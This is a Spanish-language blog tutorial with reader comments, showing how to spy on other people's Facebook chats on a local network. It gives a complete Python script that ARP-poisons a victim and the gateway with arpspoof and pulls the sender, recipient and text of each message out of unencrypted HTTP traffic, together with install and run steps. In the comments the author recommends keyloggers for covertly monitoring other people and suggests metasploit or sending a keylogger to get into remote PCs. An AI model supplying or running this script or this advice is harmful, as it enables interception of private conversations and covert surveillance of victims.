Espiar conversaciones en Facebook
septiembre 5, 2011 54 comentarios
Hola a Todos..!
Hoy les mostraré de qué manera se pueden espiar las conversaciones en Facebook, siempre y cuando la víctima no tenga sus datos encriptados o lo que comúnmente se conoce en Facebook como ”Navegación Segura”.
Antes de todo, es importante mencionar que esta publicación se realiza con dos objetivos muy importantes.
- Para fines Educativos.
- Para concienciar a las personas a tomar medidas de seguridad en la red.
Las herramientas que utilizaremos, en informática se le conoce como “Sniffer“, que según Wikipedia es: ”un analizador de paquetes que captura las tramas de una red de computadoras”.
‘
+Más información en: http://es.wikipedia.org/wiki/Analizador_de_paquetes.
‘
Luego de la introducción… Manos a la obra…!!.
‘
PASO I.
El código que utilizaremos está escrito en Pithon , así que necesitamos tener instalado las siguientes herramientas para que funcione.
- En mi caso, utilizaré backtrack 5r1, que si bien es cierto, estas herramientas ya están instaladas, pero ustedes pueden instalarlas de la siguiente manera.
Para Debian, ubuntu y derivados.
‘
[naughtyboyOS ~# ] apt-get install python-dpkt python-pypcap dsniff
El comando de arriba tendrás que ejecutarlo como root (por si acaso =P).
‘
Una vez instalado los paquetes, crearemos el siguiente script que nos permitirá sniffer a nuestra víctima.
‘
OJO: El script deberá ser guardado con la terminación .py (recordá que es lenguaje pithon).
‘
#!/usr/bin/env python
#-*-encoding:utf8-*-
""" El conocimiento es Libre"""
''' Traducido por ZtuX... publicado en http://cezequiel.wordpress.com'''
"""
Este programa es software libre: Usted puede redistribuirlo y / o modificar
bajo los términos de la licencia GNU General Public License publicada por
la Free Software Foundation, bien de la versión 3 de la Licencia, o
(a su elección) cualquier versión posterior.
Este programa se distribuye con la esperanza de que sea útil,
pero SIN NINGUNA GARANTÍA, incluso sin la garantía implícita de
COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
Licencia Pública General GNU para más detalles.
Usted debería haber recibido una copia de la Licencia Pública General GNU
junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap
def check_root():
""" Devuelve Verdadero (True) si el usuario es root, de lo contrario Falso (False) """
if os.getenv('LOGNAME','none').lower() == 'root':
return True
return False
def poison(iface,victim, gw):
""" IP Forwarding """
os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
""" ARP cache poisoning, silent, in both directions """
os.system("arpspoof -i "+iface+" -t "+victim+" "+gw+" 2> /dev/null &")
os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
print("Envenenamiento de Cache ARP...")
def fbchatgrep(p,pid):
data = str(p.data)
if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]
if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poison clones)
pid = msgid
print(" ")
s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
print(unicode(s,'unicode_escape').encode('utf-8'))
print(" ")
return pid
if __name__ == '__main__':
if len(sys.argv) < 4:
print '''Traducido por ZtuX... Visita http://cezequiel.wordpress.com
Para usar siga esta Sintaxis: ./sniff.py <Intefaz> <Victima> <Gateway>
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
sys.exit(0)
if not check_root():
print 'Debes ser SuperUsuario'
sys.exit(1)
pid="fo bar"
pc = pcap.pcap(sys.argv[1])
pc.setfilter('tcp and port 80') #Sniff only http
try:
print 'Escuchando en: %s' % (pc.name)
print 'Para Salir teclea: Control+C'
poison(sys.argv[1],sys.argv[2],sys.argv[3])
for ts, pkt in pc:
packet = dpkt.ethernet.Ethernet(pkt)
pid = fbchatgrep(packet,pid)
except KeyboardInterrupt:
os.system("sysctl -w .net.ipv4.ip_forward=0 > /dev/null") # Deshabilitar IP Delantera
nrecv, ndrop, nifdrop = pc.stats()
print '\n%d packets received by filter' % nrecv
print '%d packets dropped by kernel' % ndrop
PASO II.
COPIAR EL CÓDIGO Y GUARDARLO con la extensión .py
[naughtyboyOS ~# ] nano sniff_hack.py
Recordá en nano —> [CRTL O =GUARDAR | CTRL X = SALIR]
Ahora, vamos a darle permisos de ejecución a sniff_hack.py
[naughtyboyOS ~# ] chmod +x sniff_hack.py
… Finalmente, lo ejecutamos como cualquier Script y se nos indicará cómo utilizarlo.
[naughtyboyOS ~# ] ./sniff_hack.py
Es importante fijarse cuál es nuestra interfaz de red. Recordá el comando para verlo.
ifconfig
Siguiendo el ejemplo que nos arrojó el script, haremos la prueba.
La interfaz que estoy usando es “eth0″ y la IP víctima o sea la mía es 192.168.1.100, más la IP del router 192.168.1.254
Observá.
Listo!! Ya con esto, El sniffer está escuchando, y preparado para mostrarnos los datos que se filtren.
Estoy conectado y le enviaré un chat a mi amigo “Ariel Pereira”.
Listo!!!
¿Cómo evitarlo? -Al inicio lo mencioné, facebook nos permite cifrar nuestra naveagación, para ello debés activar la opción “Navegación segura” en las opciones de configuración.
Saludos…
Carlos E. Sánchez Castillo.
Estimado, muy interesante….
Gracias, mi estimada. =)
asi muy interesante
no soy capaz de hackear
hola, esta interesante tu blog pro me salta una duda…
Esto tambien funciona en fedora?
claro q funciona Lesly.
Obviamente el comando de instalacion difere segun la distro.
Saludos
Muy buena esta publicacion! Sobre todo la conversacion que espiaste! Jajajajaja
Jajaja…. De nada, compañero, Ariel Pereira.
Una pregunta un poco compleja, hay forma de hacer que este script se ejecute automáticamente al arrancar la PC y que este se ejecute de forma invisible y que ademas guarde el historial de chat? (por aquello, deseo monitorear el chat de mis hijos). Estuve buscando un poco de información pero es complejo para un usuario novato como yo
Hola, Alonso Gamboa.
Respondo a tus preguntas: “Por supuesto que se puede crear un Script que se ejecute automáticamente y en segundo plano, y que además guarde en un archivo el historial de la conversación, incluso, pueda mandarte este archivo a tu correo electrónico” el asunto está en que, esto sería un método bastante robusto de entender para “nosotros” los usuarios “novatos” o que nos “iniciamos en linux”.
No me estás preguntando, pero, una buena opción para “Monitorear” el chat de tus hijos sería (en mi opinión muy personal) instalar una herramienta Keylogger. Si usás Windows, hay muchísimas en la Red, y la buena noticia es que también existen keylogger para Linux…
Prueba con “Linux KeyLogger (lkl)”. Más adelante estaré publicando cómo instalar y configurar esta herramienta.
Saludos.
no sirve siempre tienes que descargar algo para poder realizar esto y como tienes que hacer muchas cosas es aburrido y nadie lo hace y entonces no funciona y no sirve
Brayan eres tu ?
Gracias hermano lo investigare
hola amigo!! este truco que muestras la victima tiene que estar en la misma red?? no puedo hackear su face de un amigo que esta en otro lugar??
Efectivamente, este método es solamente dentro de una red de área local, como ya lo has mencionado.
como estas tre pregunto si esto funcionaria en windows??
Hola, Alberto.
El script está hecho en python, y corre sólamente en backtrack (distribución linux). Obviamente, el sistema operativo que la víctima utilice es indistinto.
Saludos.
No entiendo como asi solo puede ser en linux ?¿?¿?¿?
Necsit rspst
El script es en Linux, el ataque puede ser a cualquier pc con acceso a Internet. Saludos
hola,muy bueno el script,pero me gustaria saber si este sirve para PCs que se conectan al router por medio WIFI con cifrado WEP o WPA? gracias
Claro que funciona, Walter.
Saludos.
Antes que nada, como comienzo la operación? donde escribo esos comandos?
Esta práctica se realiza en Sistemas Operativos Linux, distriibuciones Debian (Backtrack, ubuntu, entre otros) Saludos.
oye mira casi no entendy
ay q ser programador para entenderle a esto?
No es necesario ser programador para entenderlo. Fácilmente a través de copiar y pegar se logra realizar esta práctica, no obstante, es más fácil comprender el script si al menos se poseen conocimientos básicos de programación.
Saludos.
Estimado amigo, tal como esta no me permitía snifear las conversaciones, tuve que activar el ip_forward a “1″, era realmente necesario?
Es posible que sirva para HTTPS (puerto 443) , o que deberíamos hacer para que funcionase con tal?
Saludos
Este script está diseñado solamente para navegación no cifrada. Saludos
Estimado Carlos Sánches :
El script actualmente no funciona con las últimas versiones de Windows Messenger , por ejemplo con la version 2011, probé con versiones anteriores como la del 2008 y funciona de maravilla, lo malo que ya no se usa, hay alguna actualizacion respecto al script usado o algun otro tipo de solucion?
Muchas gracias por tu ayuda.
Saludos
Con este script no!
no se puede en Win7 no ? :S
En cualquier SO se puede.
como es eso de enviar un chat? osea que para poder espiar la conversacion debo primero hablar con aquella persona para qe el programa pueda empezar a filtrar la informacion???
PD:Soy Noob, Por Eso La Pregunta.
***es mejor dejar el gallinero de windows—-> y entrar a la casa de linnux***
No tienes que chat con la víctima. En este caso, yo fui mi propia víctima.
Solo red local ???
Efectivamente.
Hola… muy buena informacion pero habra alguna aplicacion para celular……
Esta funciona perfectamente con smartphone.
hola una consula me pudes informar como entrar a una pc ya sea a la que tenga como victima en otro lugar sabiendo su ip, o mejor dicho entrar a las pc que esten conectada a una determinada señal wifi y asi ver todo lo que hace remotamente dime que programa puedo usar
gracias
Utiliza algún snifer para ver lo que hace a través de la red. O, metasploit o mándale un keylogger. Etc. Saludos.
oye amigo pongo la direccion ip de la victima y la del modem pero no me aparece nada cuando lanzo el scrip como lo puedo solucionar
Sigue los pasos. saludos.
En que distro de linux , lo probaste… que en centos 6 no va por nada muy complicado el pypcap
David, esta práctica se realizó en Backtrack 5. Saludos.
Alguna idea de que paso , instale el backtrack 5 r3, instale todo…
ejecute el script, me aparecio el envenenamiento de ARP , intente hacer funcionar con mi propia cuenta. asigne la ip victima es mi ip 192.168.0.253 , la del router o gateway 192.168.0.254 interfaz eth0 pero no funciono alguna idea que revisar??? obviamente que lo hice con mi cuenta con http y no conexion segura…
me llega hasta donde se supone que filtran los paquetes…
a mi me sucede lo mismo ya he hecho de todo incluso,,,, active el ip forward=1 y nada no snifea
hola mi hermano me amenaso diciendo que las conversaciones se las enseñaria a mi mamá a el no lo tengo agregado en fb y ya puse en modo de navegacion segura entoncs ya no podra verlas? o hai mas metodos para poderla ver. grasias
ya no podrá verlas con este truco, sin embargo, pueda que él tenga instalado un programa espía (Keylogger) sin que vos lo sepás, y así observa todas tus conversaciones.
Te recomiendo antimalware bytes. Hay un versión free. Es muy bueno detectando keylogger’s. saludos.
Hola, me podrías ayudar?
Cuando corro el programa con el eth0 mi IP y la IP del router me regresa lo siguiente
Traceback (most recent call last):
File “./sniff_hack.py.save”, line 67, in
pc = pcap.pcap(sys.argv[1])
File “pcap.pyx”, line 206, in pcap.pcap.__init__
OSError: eth0: No such device exists (SIOCGIFHWADDR: No such device)
Como podría solucionarlo? Gracias
Estás copiando y pegando mal, seguro.
Hola! oye, como instalo el programa soy principiante y si me gustaria mucho, saber la informacion qe necesito!
Gracias
porfavor enseñame como puedo instalar ese programa ..no se si me puedes dar el link para instalarlo porfis =)
su puta madre no le entendi hijos de bich